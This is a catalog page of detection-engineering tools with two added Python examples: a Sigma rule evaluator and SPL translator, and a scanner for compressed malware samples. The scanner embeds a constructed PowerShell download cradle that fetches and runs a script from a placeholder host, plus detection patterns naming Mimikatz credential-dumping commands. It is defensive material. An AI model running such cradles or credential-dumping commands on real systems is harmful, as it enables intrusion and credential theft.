Detection engineering and detection-as-code platforms for authoring, managing, testing, translating, sharing, and deploying detection rules and content (Sigma, YARA, Suricata, SIEM/EDR correlation rules) across the SOC. Includes detection rule repositories, generators, converters, and rule-management tooling.
Browse 188 detection engineering tools
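The "authoring, testing and translating" workflow the category describes can be shown in miniature. The following is an added example written for this page, not the code of any tool listed on it: a small evaluator for a subset of Sigma's rule syntax (selection maps, the `|contains`, `|startswith` and `|endswith` modifiers, and conditions of the form `A` or `A and not B`), run against constructed Sysmon-style process-creation events, plus a translator that renders the same rule as a simplified Splunk search string. The rule, the field names and the sample events are all constructed for the example.

```python
"""
Minimal Sigma-style rule evaluator and SPL translator.
Added example for this page; not the code of any catalogued tool.
Supports a subset of Sigma: selection maps, the |contains / |startswith /
|endswith value modifiers, and conditions "A" or "A and not B".
"""
import json
import re
from typing import Any, Dict, List

# Constructed rule in (a subset of) Sigma detection syntax. Field names follow
# Sysmon Event ID 1 (process creation), which Sigma's windows/process_creation
# logsource maps to. Values in a list are alternatives (OR); fields are ANDed.
RULE: Dict[str, Any] = {
    "title": "Encoded PowerShell Command Line",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": [" -enc ", " -encodedcommand ", " -e "],
        },
        "filter_sccm": {
            # Hypothetical tuning filter: encoded commands launched by the SCCM agent
            "ParentImage|endswith": "\\CcmExec.exe",
        },
        "condition": "selection and not filter_sccm",
    },
}

# Constructed sample events, one JSON object per line as an EDR/SIEM export might emit.
SAMPLE_LOG = """\
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA...", "ParentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe"}
{"EventID": 1, "Image": "C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe", "CommandLine": "pwsh.exe -File C:\\\\scripts\\\\backup.ps1", "ParentImage": "C:\\\\Windows\\\\explorer.exe"}
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "powershell.exe -EncodedCommand ZQBjAGgAbwA=", "ParentImage": "C:\\\\Windows\\\\CCM\\\\CcmExec.exe"}
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\cmd.exe", "CommandLine": "cmd.exe /c echo -enc test", "ParentImage": "C:\\\\Windows\\\\explorer.exe"}
"""

_COND_RE = re.compile(r"^(\w+)(?:\s+and\s+not\s+(\w+))?$")


def _match_value(value: Any, pattern: str, modifier: str) -> bool:
    """Compare one field value against one pattern. Sigma matching is case-insensitive."""
    if value is None:
        return False
    value, pattern = str(value).lower(), pattern.lower()
    if modifier == "contains":
        return pattern in value
    if modifier == "startswith":
        return value.startswith(pattern)
    if modifier == "endswith":
        return value.endswith(pattern)
    return value == pattern


def selection_matches(selection: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """All fields of a selection must match; list values are alternatives."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if isinstance(patterns, str):
            patterns = [patterns]
        if not any(_match_value(event.get(field), p, modifier) for p in patterns):
            return False
    return True


def _parse_condition(rule: Dict[str, Any]):
    cond = rule["detection"]["condition"].strip()
    m = _COND_RE.match(cond)
    if not m:
        raise ValueError(f"unsupported condition (subset only): {cond!r}")
    return m.group(1), m.group(2)


def evaluate(rule: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """True if the event triggers the rule under the supported condition grammar."""
    det = rule["detection"]
    include, exclude = _parse_condition(rule)
    if not selection_matches(det[include], event):
        return False
    return not (exclude and selection_matches(det[exclude], event))


def parse_events(log_text: str) -> List[Dict[str, Any]]:
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def run_rule(rule: Dict[str, Any], log_text: str) -> List[int]:
    """Zero-based line numbers of events that trigger the rule."""
    return [i for i, ev in enumerate(parse_events(log_text)) if evaluate(rule, ev)]


def _spl_term(key: str, patterns: Any) -> str:
    """Render one selection field as an SPL search term (simplified: wildcards only)."""
    field, _, modifier = key.partition("|")
    if isinstance(patterns, str):
        patterns = [patterns]
    terms = []
    for p in patterns:
        p = p.replace("\\", "\\\\").replace('"', '\\"')
        if modifier == "contains":
            p = f"*{p}*"
        elif modifier == "startswith":
            p = f"{p}*"
        elif modifier == "endswith":
            p = f"*{p}"
        terms.append(f'{field}="{p}"')
    return terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")"


def to_spl(rule: Dict[str, Any]) -> str:
    """Translate the rule into a simplified Splunk search (no index/sourcetype mapping)."""
    det = rule["detection"]
    include, exclude = _parse_condition(rule)
    parts = [_spl_term(k, v) for k, v in det[include].items()]
    if exclude:
        parts.append("NOT (" + " ".join(_spl_term(k, v) for k, v in det[exclude].items()) + ")")
    return " ".join(parts)


if __name__ == "__main__":
    print("SPL:", to_spl(RULE))
    print("hits on sample log (line numbers):", run_rule(RULE, SAMPLE_LOG))
```

Only the first sample event fires: the second has no encoded-command switch, the third is suppressed by the filter, and the fourth is not PowerShell. Real Sigma conditions (`1 of selection*`, parenthesised boolean expressions, aggregation) and real backends (pySigma, sigma-cli) cover far more than this subset; the point of the example is that a rule is data that can be unit-tested against sample events before it is translated and deployed.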
Access a repository of Analytic Stories and security guides mapped to industry frameworks, with Splunk searches, machine learning algorithms, and playbooks for threat detection and response.
SALO is a framework that generates synthetic log events for security testing and research without requiring actual infrastructure or triggering real events.
An open-source platform that builds instrumented environments, simulates attacks, and integrates with Splunk for detection rule development and testing.
A collection of 200 Windows EVTX samples for testing detection scripts and for DFIR training.
A tool that runs YARA rules against node_modules folders to identify suspicious scripts in npm dependencies.
A tool that runs YARA rules against GZip-, BZip2- and LZMA-compressed malware samples without manual decompression.
Official repository of YARA rules for threat detection and hunting.
A curated collection of Sigma & Yara rules and Indicators of Compromise (IOCs) for threat detection and malware identification.
An IDA Pro plugin that uses YARA rules to automatically detect cryptographic constants and patterns in binary files during reverse engineering analysis.
An embeddable YARA library for Java with support for loading rules and scanning data.
A modular Sysmon configuration repository for customizing Microsoft Sysinternals Sysmon configurations.
A multithreaded YARA scanner for incident response or malware zoos.
Generates YARA rules from function basic blocks in x64dbg.
VolatilityBot automates memory dump analysis by extracting executables, detecting code injections, and performing automated malware scanning using YARA and ClamAV.
A .NET wrapper for libyara that provides a simplified API for developing tools in C# and PowerShell.
A command-line tool that visually displays YARA rule matches, regex matches, and hex patterns in binary data with colored output and configurable context bytes.
Repository of automatically generated YARA rules from Malpedia's YARA-Signator with detailed statistics.
A tool for visualizing correspondences between a YARA ruleset and samples.
A tool for deep analysis of malicious files using ClamAV and YARA rules, with features like scoring suspect files, building visual tree graphs, and extracting specific patterns.
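Scanning compressed samples "without manual decompression", as the GZip/BZip2/LZMA entry above describes, comes down to sniffing the container from its magic bytes, inflating in memory and handing the payload to the rule engine; the caveat a practitioner adds is a cap on inflated size, since a malware zoo is exactly where a decompression bomb will turn up. The following is an added example written for this page, not the code of that tool. It uses only the Python standard library, so the rule set is a deliberately tiny stand-in for YARA (substring patterns with an "any"/"all" condition) and would be replaced by `yara.compile()`/`rules.match(data=...)` from yara-python in practice; the rule names, patterns and the sample are constructed.

```python
"""
Transparent scanning of compressed samples: sniff the container from magic bytes,
inflate in memory with a size cap, peel nested layers, then run rules on the payload.
Added example for this page; not the code of the catalogued tool.
The rule set is a stand-in for YARA so the script runs with the standard library.
"""
import bz2
import gzip
import lzma
import zlib
from typing import Dict, List, Optional, Tuple

MAX_INFLATED = 64 * 1024 * 1024   # refuse to inflate past 64 MiB (decompression-bomb guard)
MAX_LAYERS = 4                    # refuse absurdly nested containers (x.xz.bz2.gz...)

# Magic prefixes for the three formats. Legacy .lzma has no reliable magic, so only
# the xz container is sniffed here (assumption of this example).
_MAGIC: List[Tuple[bytes, str]] = [
    (b"\x1f\x8b", "gzip"),
    (b"BZh", "bzip2"),
    (b"\xfd7zXZ\x00", "xz"),
]

# Streaming decompressor constructors: all three accept a max_length argument,
# which is what makes the size cap enforceable before the output is materialised.
_DECOMPRESSORS = {
    "gzip": lambda: zlib.decompressobj(16 + zlib.MAX_WBITS),  # 16+ selects gzip framing
    "bzip2": bz2.BZ2Decompressor,
    "xz": lzma.LZMADecompressor,
}


def sniff(data: bytes) -> Optional[str]:
    """Return the container format name, or None if the bytes are not a known container."""
    for magic, name in _MAGIC:
        if data.startswith(magic):
            return name
    return None


def inflate(data: bytes, max_out: int = MAX_INFLATED, max_layers: int = MAX_LAYERS) -> Tuple[bytes, List[str]]:
    """Peel compression layers until the payload is no longer a recognised container.

    Returns (payload, list of formats peeled, outermost first). Raises ValueError when a
    layer would inflate past max_out or when nesting exceeds max_layers.
    """
    layers: List[str] = []
    for _ in range(max_layers):
        fmt = sniff(data)
        if fmt is None:
            return data, layers
        decomp = _DECOMPRESSORS[fmt]()
        # Ask for one byte past the cap: if we get it, the stream is over budget.
        out = decomp.decompress(data, max_out + 1)
        if len(out) > max_out:
            raise ValueError(f"{fmt} stream inflates beyond {max_out} bytes (possible decompression bomb)")
        data = out
        layers.append(fmt)
    if sniff(data) is not None:
        raise ValueError(f"more than {max_layers} nested compression layers")
    return data, layers


def is_decompression_bomb(blob: bytes, max_out: int = MAX_INFLATED) -> bool:
    """True if inflating the blob would exceed the cap (or the nesting limit)."""
    try:
        inflate(blob, max_out=max_out)
    except ValueError:
        return True
    return False


# Stand-in rule set (constructed): name -> (byte patterns, "all" or "any" condition).
RULES: Dict[str, Tuple[List[bytes], str]] = {
    "Suspicious_PowerShell_Downloader": ([b"DownloadString", b"IEX", b"Net.WebClient"], "all"),
    "Mimikatz_Strings": ([b"sekurlsa::logonpasswords", b"privilege::debug"], "any"),
}


def match_rules(payload: bytes, rules: Dict[str, Tuple[List[bytes], str]] = RULES) -> List[str]:
    hits = []
    for name, (patterns, cond) in rules.items():
        found = [p in payload for p in patterns]
        if (cond == "all" and all(found)) or (cond == "any" and any(found)):
            hits.append(name)
    return hits


def scan_sample(blob: bytes) -> Dict[str, object]:
    """Inflate (if needed) and scan; the caller sees which layers were peeled."""
    payload, layers = inflate(blob)
    return {"layers": layers, "matches": match_rules(payload)}


# Constructed sample: a PowerShell download cradle packed as xz inside gzip, built at
# import time so the script is self-contained. BOMB is a small bzip2 stream that
# inflates to 4 MB of zeros, used to exercise the size cap.
SCRIPT = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_GZ_XZ = gzip.compress(lzma.compress(SCRIPT))
BOMB = bz2.compress(b"\x00" * 4_000_000)

if __name__ == "__main__":
    print(scan_sample(SAMPLE_GZ_XZ))
    print("bomb at 1 MiB cap:", is_decompression_bomb(BOMB, 1024 * 1024))
```

The cap is enforced by the streaming decompressors' `max_length` argument rather than by checking the output after the fact, so a hostile sample never gets to allocate more than the budget. A YARA-backed version keeps `sniff`/`inflate` unchanged and only swaps `match_rules` for a compiled ruleset.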